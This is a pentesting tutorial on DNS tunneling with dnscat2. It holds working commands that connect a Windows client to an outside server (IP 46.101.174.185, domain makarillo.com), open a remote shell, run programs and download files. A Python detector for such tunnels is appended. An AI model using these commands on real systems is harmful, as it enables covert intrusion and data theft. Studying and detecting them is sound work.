DNS Tunneling with dnscat2

One of the challenges of a pentester is to communicate through firewalls and IDS from inside a system. DNS tunneling is a very effective technique for overcoming this kind of protection mechanism. Dnscat2 is a very popular tool for DNS tunneling.

You can install your dnscat2 server on your own machine or on a machine in the cloud. You can hire a virtual server on Digital Ocean and create an Ubuntu droplet there (you'll receive the root password for the droplet by e-mail). After that you can connect to the machine over ssh.

To install dnscat2 server there run the following commands:

# apt-get update
# apt-get -y install ruby-dev git make g++
# gem install bundler
# git clone https://github.com/iagox86/dnscat2.git
# cd dnscat2/server
# bundle install

If you run into problems when running "bundle install", run the following commands and then install the missing libraries:

gem install rubygems-update

update_rubygems

On the client machine (here a Windows client) you can install the dnscat2 client (dnscat2-v0.05-client-win32.zip) from the developer's website.

Now, you can start dnscat2 server with the following command:

ruby ./dnscat2.rb

After that, when you run dnscat2.exe on the Windows machine with the following command:

dnscat2.exe --dns server=46.101.174.185,port=53

you'll get a shell. Just type:

session -i 1

exec calc.exe

You'll see the calculator (calc.exe) running on the Windows machine, and all of this TCP traffic is encapsulated within UDP port 53 traffic.

A better way of running the dnscat2 server is to register a legitimate domain name and make the IP address of the dnscat2 server its authoritative name server. For this purpose I used makarillo.com and defined the IP address 46.101.174.185 as its name server.

After that it is possible to run the dnscat2 server with this domain name as a parameter:

ruby ./dnscat2.rb makarillo.com,server=8.8.8.8,port=53

Now all you have to do on the client side is run the tool again with the same domain name:

dnscat2.exe makarillo.com

You'll now have a command shell on the client machine. You can list the contents of the current directory and then download the files you want:

dnscat2> session -i 1

command (Lab) 1> exec "cmd /c dir>output.txt"

command (Lab) 1> download output.txt
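As an added example (not part of the original post or of the dnscat2 project), here is a small Python detector a defender could run over a DNS query log to spot the pattern both setups above produce: a single client sending many TXT/CNAME/MX queries for one registered domain, with long hex-encoded labels in the subdomains. The log format, the client addresses and the hex values are constructed for the example; the scoring thresholds are assumptions to tune against your own baseline.

```python
import math
import re
from collections import Counter, defaultdict

# Constructed sample query log ("client qtype qname"), not captured traffic.
# The long hex labels imitate dnscat2 encoding session data into subdomains.
SAMPLE_LOG = """\
10.0.0.5 A www.example.com
10.0.0.5 TXT 7e4b0100000155a0c1f3.5b2d9a4e1c0f7a3b6d.makarillo.com
10.0.0.5 CNAME 8a1c0100000155a0c1f4.9e0d4b7a2c3f5e1d8b.makarillo.com
10.0.0.7 A mail.example.com
10.0.0.5 MX 3f9d0100000155a0c1f5.a4b6c8d0e2f4a6b8c0.makarillo.com
10.0.0.5 TXT 5c2e0100000155a0c1f6.d1e3f5a7b9c1d3e5f7.makarillo.com
"""

# Record types dnscat2 can carry data in; rare in ordinary client lookups.
DATA_QTYPES = {"TXT", "CNAME", "MX", "NULL"}
HEX_LABEL = re.compile(r"^[0-9a-f]{16,}$", re.IGNORECASE)


def shannon_entropy(s: str) -> float:
    """Bits per character; 0.0 for an empty or single-symbol string."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def query_score(qtype: str, qname: str) -> int:
    """0..2: one point for a data-carrying qtype, one for an encoded-looking label."""
    labels = qname.rstrip(".").split(".")
    score = 1 if qtype.upper() in DATA_QTYPES else 0
    # Skip the last two labels: that is the registered domain (e.g. makarillo.com).
    if any(len(lab) >= 16 and (HEX_LABEL.match(lab) or shannon_entropy(lab) >= 3.0)
           for lab in labels[:-2]):
        score += 1
    return score


def find_tunnel_candidates(log_text: str, min_queries: int = 3, min_mean: float = 1.5):
    """Group queries by (client, registered domain) and return the suspicious groups."""
    groups = defaultdict(list)
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 3:
            continue  # tolerate malformed lines instead of aborting the scan
        client, qtype, qname = parts
        base = ".".join(qname.rstrip(".").split(".")[-2:]).lower()
        groups[(client, base)].append(query_score(qtype, qname))
    return {key: {"queries": len(s), "mean_score": sum(s) / len(s)}
            for key, s in groups.items()
            if len(s) >= min_queries and sum(s) / len(s) >= min_mean}
```

On the sample log only the (10.0.0.5, makarillo.com) group is flagged; the ordinary A lookups for example.com never reach the query or score thresholds.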

Below you can see snapshots of both the server and client side of the dnscat2 tool running:

First the client side:

[Screenshot: dnscat2 client side]

And the server side running:

[Screenshot: dnscat2 running on the server]

Keep on digging the rabbit hole :)